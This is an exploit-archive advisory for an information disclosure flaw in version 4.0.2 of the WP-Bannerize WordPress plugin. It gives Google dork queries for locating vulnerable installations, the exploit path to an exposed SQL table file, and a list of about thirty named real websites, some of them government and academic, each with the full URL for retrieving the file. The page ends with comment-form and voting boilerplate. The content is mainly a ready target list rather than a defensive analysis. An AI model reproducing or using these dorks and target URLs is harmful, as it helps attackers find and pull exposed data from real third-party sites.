WordPress WP-Bannerize Plugins 4.0.2 Database Backup Disclosure

2018.12.12

KingSkrupellos (GB)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264 CWE-23 CWE-200 CWE-530

Dork: inurl:''/wp-content/plugins/wp-bannerize/Classes/''

#################################################################################################
# Exploit Title : WordPress WP-Bannerize Plugins 4.0.2 Database Backup Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 08/12/2018
# Vendor Homepage : undolog.com ~ wordpress.org/plugins/wp-bannerize/
# Software Download Link : downloads.wordpress.org/plugin/wp-bannerize.4.0.2.zip
+ github.com/jwachira/tablog/archive/master.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 4.0.2
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-bannerize/Classes/''
intext:''© COPYRIGHT 2018. POWERED BY WORDPRESS HOARDER THEME BY THEMEZILLA''
intext:''Powered by WP 3.2.1 & Xanthos designed by Fab Themes.''
intext:''Powered by agenciaspasso.com.br''
intext:''© 2017 - Desenvolvido por Webmundo Soluções Interativas''
intext:''Developed by Paolo Romano. Copyright by BCE SRL.''
intext:''Desenvolvido por E-gnição.''
intext:''Zadarweb Studio''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
#################################################################################################
# Admin Panel Login Path :
/wp-login.php
# Exploit :
/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
#################################################################################################
# Example Vulnerable Sites =>
[+] mantena.mg.gov.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] rwmf.net/v2/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] lszd.hr/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] dfbrcko.ba/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] jazzin.rs/eng/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ilmediano.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] agitaeco.com.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] kraljeva-sutjeska.com/portal/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] decryptageo.fr/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ggu.gr/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ozorkow.info.pl/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] feiracultural.art.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] tourdemarienvelde.nl/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] dobranovica.si/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] maxwoman.ua/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] bce.it/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] caia.ro/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] fedfach.cl/site_news/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] mundocritico.es/revista/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] tepe.com.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] rdmonline.com.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] assoleste.org.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] theartsshelf.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] fakt.kg/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ceciliato.com.br/site/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] dfbrcko.ba/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] ilmediano.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] agitaeco.com.br/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] alb365.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] thecherryblossomgirl.com/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
[+] vortexhost.com.br/sites/fucapi/_____dsftrsfucapiblog/wp-content/plugins/
wp-bannerize/Classes/wpBannerizeTable.sql
[+] iict.ac.ir/wp-content/plugins/wp-bannerize/Classes/wpBannerizeTable.sql
#################################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
#################################################################################################

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress WP-Bannerize Plugins 4.0.2 Database Backup Disclosure

Dork: inurl:''/wp-content/plugins/wp-bannerize/Classes/''

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.